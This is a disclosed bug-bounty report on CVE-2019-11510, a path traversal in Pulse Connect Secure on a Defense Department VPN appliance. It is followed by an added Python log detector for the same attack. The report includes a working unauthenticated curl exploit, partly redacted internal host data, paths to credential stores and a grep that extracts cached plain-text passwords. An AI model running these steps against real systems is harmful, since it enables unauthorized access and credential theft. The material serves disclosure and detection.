U.S. Dept Of Defense: [CVE-2019-11510] Path Traversal on ████████ leads to leaked passwords, RCE, etc

HackerOne report 671857, submitted by cdl via hackerone.com, Aug 12, 2019, 18:42

CVSS3: 10.0 High (Critical under the CVSS v3.1 qualitative scale)
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: CHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 7.5 High
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
  Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL

EPSS: 0.973 High (percentile 99.8%)

Summary / Description:
█████ is vulnerable to an unauthenticated path traversal (CVE-2019-11510) that reads arbitrary files from the appliance, including cached plain-text VPN credentials, and can be chained to remote code execution.

Impact

Critical

Step-by-step Reproduction Instructions

  1. Run the following cURL command to read /etc/hosts from the appliance. The --path-as-is flag matters: without it, curl collapses the ../ segments locally and the traversal never reaches the server.
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
## File generated by DSNet::Hosts::update at Thu Aug  1 13:24:40 2019

127.0.0.1	localhost
█████128.141	KMPC1_Node4
█████████252.82	acrcxznxx07d-10███
███████252.74	acrcxznxx06d-10███
███252.67	ODA-SCAN███
█████████252.65	ODA-VIP-1█████████
█████████252.63	ODA-1██████
███252.196	subversion████████
██████252.134	acrcxznxx07d-12██████
██████████252.13	ODA-2████
█████251.16	acdeva0xxb5l010███
████251.15	acdeva0xxb5l009████████
███████251.14	acdeva0xxb5l008████████
█████████250.239	devikrome█████
███████250.216	ws.soa██████
██████████250.192	ac0hxzndb01d-07.rsn.aac████
█████████250.16	devccimm███
██████250.112	devauth████████l devauth████████
████████250.104	ac0hxznap02d-03████████
███████1.235	spex████████
████1.205	auth████████
███1.164	internal████ internal███████
████1.142	ensq██████████ ensq█████
███████0.92	ac0hqa0xxa3b021.rsn.aac█████████
███0.55	g2g███
█████████0.177	Ac0hqa0xxa1b005.rsn.aac█████████
█████64.181	ac0hqsmap13p
████64.142	ac0hqsmxx03p
██████████40.237	emmggb████████
████████40.126	ac0hqapxx25p.rsn.aac████████
██████████221.42	gcrcknox gcrcknox████
█████████220.81	ft1ariss█████
██████220.245	ccimm█████████
██████220.150	ensqrtn████
███████220.145	pthensqtrain██████
██████212.9	acrcea0xxb5l035█████
██████212.64	acrcea0xxb5l034██████
███18.60	questcentral questcentral███
██████████163.35	hrcremedy█████
███████78.107	afrissimt.rs████
██████8.61	netscout███████
████████205.203	ac0hqa0xxb5l007█████
█████████205.202	ac0hqa0xxb5l006██████████
██████205.200	acrtna0xxb5l003█████
███146.8	AC0HQC2A0A3B021.RSN.AAC████████
█████████146.7	AC0HQC2A0A3B020.rsn.aac████████
█████████145.91	ac0hqwsxx04p.rsn.aac█████
█████145.149	caliber11.rsn.aac███████
████145.118	ac0hqwsap06p.rsn.aac██████████
██████144.95	ikrome████ ft1ikrome█████████
████144.91	Auth██████████
█████144.216	ac0hqc2a0a3b010.rsn.aac██████
████197.16	acft1a0xxb5l005███████
███197.15	acft1a0xxb5l004███
████196.62	ft1ccimm██████████
█████████196.28	ft1auth████
███████195.247	ac0hldbxx02t████
███195.246	ac0hldbxx01t█████
████195.195	ac0hxzndb04t-01████
██████195.188	ac0hxznap04t-03█████████
██████████195.158	ac0hxznxx24t-02██████
██████████195.133	ft1internal████████
████████195.127	ac0hxznap03t-03█████████
██████████194.78	ws13t.soa█████ ws14t.soa█████
█████████194.165	ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████
█████194.119	rmdwebtopft1███████

The same request reads any other file on the appliance, for example:

/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb

The VPN usernames and hashed passwords are stored in the mtmp/system file, but when a user logs into the application the appliance also caches the plain-text password in dataa/data.mdb. Running

grep 'password@9' data.mdb -a

(-a makes grep treat the binary LMDB file as text) returns a large number of plain-text passwords.

████████
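As an added example (not part of Corben's report and not Pulse Secure's code), the following detector scans web-server or reverse-proxy access logs for the request shape used above: a literal or percent-encoded ".." segment under /dana/html5acc/guacamole/ with the same prefix echoed in the query string. It assumes Common Log Format lines; the sample log, its addresses, timestamps and byte counts are constructed for illustration.

```python
"""Added example, not part of the original report: flag CVE-2019-11510-style
traversal requests in access logs. All sample data below is constructed."""
import posixpath
import re
from urllib.parse import unquote

# Common Log Format request line (sufficient for the constructed sample).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# The traversal in the report runs under this prefix and repeats it in the
# query string. Browsers normalise ".." before sending, so a raw target that
# still contains a ".." segment is itself the signal.
GUAC_PREFIX = "/dana/html5acc/guacamole/"

# Constructed sample log (hypothetical addresses, times and sizes).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2019:18:40:01 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5123
203.0.113.7 - - [12/Aug/2019:18:40:09 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 200 3310
203.0.113.7 - - [12/Aug/2019:18:40:15 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/ HTTP/1.1" 200 1048576
198.51.100.4 - - [12/Aug/2019:18:41:00 +0000] "GET /dana/html5acc/guacamole/app.js HTTP/1.1" 200 40011
198.51.100.4 - - [12/Aug/2019:18:41:02 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1788
"""


def classify_target(target: str) -> dict:
    """Classify one raw request target (path plus optional query string)."""
    raw_path, _, query = target.partition("?")
    # Decode twice so %2e%2e and %252e%252e both collapse to "..".
    path = unquote(unquote(raw_path))
    dotdot = path.split("/").count("..")
    # The file the appliance would open if it resolved the path literally;
    # normpath drops ".." segments that climb above "/".
    resolved = posixpath.normpath(path)
    marker = (GUAC_PREFIX in path
              and unquote(query).startswith(GUAC_PREFIX.rstrip("/")))
    if dotdot and marker:
        verdict = "cve-2019-11510"   # full exploit shape from the report
    elif dotdot:
        verdict = "traversal"        # literal "..": not browser traffic
    else:
        verdict = "benign"
    return {"verdict": verdict, "dotdot": dotdot, "resolved": resolved}


def scan_log(text: str) -> list:
    """Return (ip, verdict, resolved_path) for every non-benign request."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        info = classify_target(m.group("target"))
        if info["verdict"] != "benign":
            hits.append((m.group("ip"), info["verdict"], info["resolved"]))
    return hits


if __name__ == "__main__":
    for ip, verdict, path in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {verdict:16} {path}")
```

The resolved path is the useful incident-response output: it tells you which files left the box (for instance data.mdb, which holds the cached plain-text passwords described above). Two caveats: the trailing "#" in the report's curl URL is a fragment and is never sent, so do not key on it; and the decode step is there so percent-encoded dots are not missed in logs, not a claim about which encodings the appliance accepts.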

Product, Version, and Configuration (If applicable)

Pulse Connect Secure; the affected releases are listed in Pulse Secure advisory SA44101:
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101

Suggested Mitigation/Remediation Actions

Update Pulse Connect Secure to a fixed release listed in SA44101.

Impact

Critical: an unauthenticated attacker can read arbitrary files, including cached plain-text VPN passwords, and can chain this vulnerability to code execution.

References:

https://hackerone.com/reports/591295

Thanks,
Corben (@cdl)
